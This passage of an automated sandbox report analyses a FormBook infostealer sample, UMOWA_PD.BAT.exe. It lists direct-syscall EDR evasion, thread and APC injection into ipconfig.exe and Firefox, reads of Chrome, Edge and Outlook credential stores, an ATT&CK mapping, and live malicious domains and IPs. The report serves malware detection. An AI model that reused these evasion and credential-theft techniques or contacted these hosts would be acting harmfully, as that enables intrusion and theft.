        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCC50D mov eax, dword ptr fs:[00000030h]2_2_33CCC50D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C92500 mov eax, dword ptr fs:[00000030h]2_2_33C92500
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B502 mov eax, dword ptr fs:[00000030h]2_2_33C8B502
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1C51D mov eax, dword ptr fs:[00000030h]2_2_33D1C51D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBE507 mov eax, dword ptr fs:[00000030h]2_2_33CBE507
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBE507 mov eax, dword ptr fs:[00000030h]2_2_33CBE507
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBE507 mov eax, dword ptr fs:[00000030h]2_2_33CBE507
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBE507 mov eax, dword ptr fs:[00000030h]2_2_33CBE507
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBE507 mov eax, dword ptr fs:[00000030h]2_2_33CBE507
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBE507 mov eax, dword ptr fs:[00000030h]2_2_33CBE507
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBE507 mov eax, dword ptr fs:[00000030h]2_2_33CBE507
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBE507 mov eax, dword ptr fs:[00000030h]2_2_33CBE507
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB1514 mov eax, dword ptr fs:[00000030h]2_2_33CB1514
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB1514 mov eax, dword ptr fs:[00000030h]2_2_33CB1514
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB1514 mov eax, dword ptr fs:[00000030h]2_2_33CB1514
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB1514 mov eax, dword ptr fs:[00000030h]2_2_33CB1514
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB1514 mov eax, dword ptr fs:[00000030h]2_2_33CB1514
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB1514 mov eax, dword ptr fs:[00000030h]2_2_33CB1514
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA252B mov eax, dword ptr fs:[00000030h]2_2_33CA252B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA252B mov eax, dword ptr fs:[00000030h]2_2_33CA252B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA252B mov eax, dword ptr fs:[00000030h]2_2_33CA252B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA252B mov eax, dword ptr fs:[00000030h]2_2_33CA252B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA252B mov eax, dword ptr fs:[00000030h]2_2_33CA252B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA252B mov eax, dword ptr fs:[00000030h]2_2_33CA252B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA252B mov eax, dword ptr fs:[00000030h]2_2_33CA252B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC1527 mov eax, dword ptr fs:[00000030h]2_2_33CC1527
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2539 mov eax, dword ptr fs:[00000030h]2_2_33CD2539
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8753F mov eax, dword ptr fs:[00000030h]2_2_33C8753F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8753F mov eax, dword ptr fs:[00000030h]2_2_33C8753F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8753F mov eax, dword ptr fs:[00000030h]2_2_33C8753F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C93536 mov eax, dword ptr fs:[00000030h]2_2_33C93536
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C93536 mov eax, dword ptr fs:[00000030h]2_2_33C93536
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB14C9 mov eax, dword ptr fs:[00000030h]2_2_33CB14C9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB14C9 mov eax, dword ptr fs:[00000030h]2_2_33CB14C9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB14C9 mov eax, dword ptr fs:[00000030h]2_2_33CB14C9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB14C9 mov eax, dword ptr fs:[00000030h]2_2_33CB14C9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB14C9 mov eax, dword ptr fs:[00000030h]2_2_33CB14C9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB44D1 mov eax, dword ptr fs:[00000030h]2_2_33CB44D1
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB44D1 mov eax, dword ptr fs:[00000030h]2_2_33CB44D1
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF4D0 mov eax, dword ptr fs:[00000030h]2_2_33CBF4D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF4D0 mov eax, dword ptr fs:[00000030h]2_2_33CBF4D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF4D0 mov eax, dword ptr fs:[00000030h]2_2_33CBF4D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF4D0 mov eax, dword ptr fs:[00000030h]2_2_33CBF4D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF4D0 mov eax, dword ptr fs:[00000030h]2_2_33CBF4D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF4D0 mov eax, dword ptr fs:[00000030h]2_2_33CBF4D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF4D0 mov eax, dword ptr fs:[00000030h]2_2_33CBF4D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF4D0 mov eax, dword ptr fs:[00000030h]2_2_33CBF4D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF4D0 mov eax, dword ptr fs:[00000030h]2_2_33CBF4D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE4EF mov eax, dword ptr fs:[00000030h]2_2_33CCE4EF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE4EF mov eax, dword ptr fs:[00000030h]2_2_33CCE4EF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F4FD mov eax, dword ptr fs:[00000030h]2_2_33D4F4FD
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC54E0 mov eax, dword ptr fs:[00000030h]2_2_33CC54E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB94FA mov eax, dword ptr fs:[00000030h]2_2_33CB94FA
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C964F0 mov eax, dword ptr fs:[00000030h]2_2_33C964F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1C490 mov eax, dword ptr fs:[00000030h]2_2_33D1C490
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C90485 mov ecx, dword ptr fs:[00000030h]2_2_33C90485
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCB490 mov eax, dword ptr fs:[00000030h]2_2_33CCB490
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCB490 mov eax, dword ptr fs:[00000030h]2_2_33CCB490
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC44A8 mov eax, dword ptr fs:[00000030h]2_2_33CC44A8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C924A2 mov eax, dword ptr fs:[00000030h]2_2_33C924A2
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C924A2 mov ecx, dword ptr fs:[00000030h]2_2_33C924A2
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE4BC mov eax, dword ptr fs:[00000030h]2_2_33CCE4BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1D4A0 mov ecx, dword ptr fs:[00000030h]2_2_33D1D4A0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1D4A0 mov eax, dword ptr fs:[00000030h]2_2_33D1D4A0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1D4A0 mov eax, dword ptr fs:[00000030h]2_2_33D1D4A0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0445 mov eax, dword ptr fs:[00000030h]2_2_33CA0445
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0445 mov eax, dword ptr fs:[00000030h]2_2_33CA0445

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtAllocateVirtualMemory: Direct from: 0x773C480CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtWriteVirtualMemory: Direct from: 0x773C482CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtProtectVirtualMemory: Direct from: 0x773C2EBCJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtQueryInformationProcess: Direct from: 0x773C2B46Jump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtResumeThread: Direct from: 0x773C2EDCJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtCreateUserProcess: Direct from: 0x773C363CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtOpenKeyEx: Direct from: 0x773C2ABCJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtSetInformationThread: Direct from: 0x773C2A6CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtQueryAttributesFile: Direct from: 0x773C2D8CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtClose: Direct from: 0x773C2A8C
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtCreateKey: Direct from: 0x773C2B8CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtProtectVirtualMemory: Direct from: 0x773B7A4EJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtCreateFile: Direct from: 0x773C2F0CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtQueryVolumeInformationFile: Direct from: 0x773C2E4CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtDeviceIoControlFile: Direct from: 0x773C2A0CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtAllocateVirtualMemory: Direct from: 0x773C2B0CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtOpenSection: Direct from: 0x773C2D2CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtQuerySystemInformation: Direct from: 0x773C47ECJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtOpenFile: Direct from: 0x773C2CECJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtReadVirtualMemory: Direct from: 0x773C2DACJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtAllocateVirtualMemory: Direct from: 0x773C3BBCJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtQueryInformationToken: Direct from: 0x773C2BCCJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtNotifyChangeKey: Direct from: 0x773C3B4CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtSetInformationProcess: Direct from: 0x773C2B7CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtSetInformationThread: Direct from: 0x773B6319Jump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtReadFile: Direct from: 0x773C29FCJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtQuerySystemInformation: Direct from: 0x773C2D1CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtAllocateVirtualMemory: Direct from: 0x773C2B1CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtResumeThread: Direct from: 0x773C35CCJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtWriteVirtualMemory: Direct from: 0x773C2D5CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtMapViewOfSection: Direct from: 0x773C2C3CJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeNtDelayExecution: Direct from: 0x773C2CFCJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: NULL target: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 2368Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\ipconfig.exeThread APC queued: target process: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeProcess created: C:\Users\user\Desktop\UMOWA_PD.BAT.exe "C:\Users\user\Desktop\UMOWA_PD.BAT.exe"Jump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: giLTwJlyLWpfb.exe, 00000003.00000000.15313054859.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000002.19981330723.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000000.15454179747.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: giLTwJlyLWpfb.exe, 00000003.00000000.15313054859.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000002.19981330723.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000000.15454179747.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: giLTwJlyLWpfb.exe, 00000003.00000000.15313054859.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000002.19981330723.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000000.15454179747.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: giLTwJlyLWpfb.exe, 00000003.00000000.15313054859.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000002.19981330723.00000000014D0000.00000002.00000001.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000000.15454179747.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: pProgram ManagerOSg
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Masquerading        		1
        OS Credential Dumping        		121
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		312
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets1
        System Network Configuration Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials2
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information        		DCSync14
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517964 Sample: UMOWA_PD.BAT.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 32 www.ngmr.xyz 2->32 34 www.whats-in-the-box.org 2->34 36 27 other IPs or domains 2->36 48 Suricata IDS alerts for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 56 3 other signatures 2->56 10 UMOWA_PD.BAT.exe 24 2->10         started        signatures3 54 Performs DNS queries to domains with low reputation 32->54 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 10->30 dropped 68 Switches to a custom stack to bypass stack traces 10->68 14 UMOWA_PD.BAT.exe 6 10->14         started        signatures6 process7 dnsIp8 44 bestpack.ee 185.86.211.137, 443, 49755, 49756 TVHORADADAES Spain 14->44 70 Maps a DLL or memory area into another process 14->70 18 giLTwJlyLWpfb.exe 14->18 injected signatures9 process10 signatures11 46 Found direct / indirect Syscall (likely to bypass EDR) 18->46 21 ipconfig.exe 13 18->21         started        process12 signatures13 58 Tries to steal Mail credentials (via file / registry access) 21->58 60 Tries to harvest and steal browser information (history, passwords, etc) 21->60 62 Modifies the context of a thread in another process (thread injection) 21->62 64 3 other signatures 21->64 24 giLTwJlyLWpfb.exe 21->24 injected 28 firefox.exe 21->28         started        process14 dnsIp15 38 dxzz.top 137.175.33.56, 49810, 49811, 49812 PEGTECHINCUS United States 24->38 40 dfmagazine.shop 84.32.84.32, 49770, 49771, 49772 NTT-LT-ASLT Lithuania 24->40 42 9 other IPs or domains 24->42 66 Found direct / indirect Syscall (likely to bypass EDR) 24->66 signatures16

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

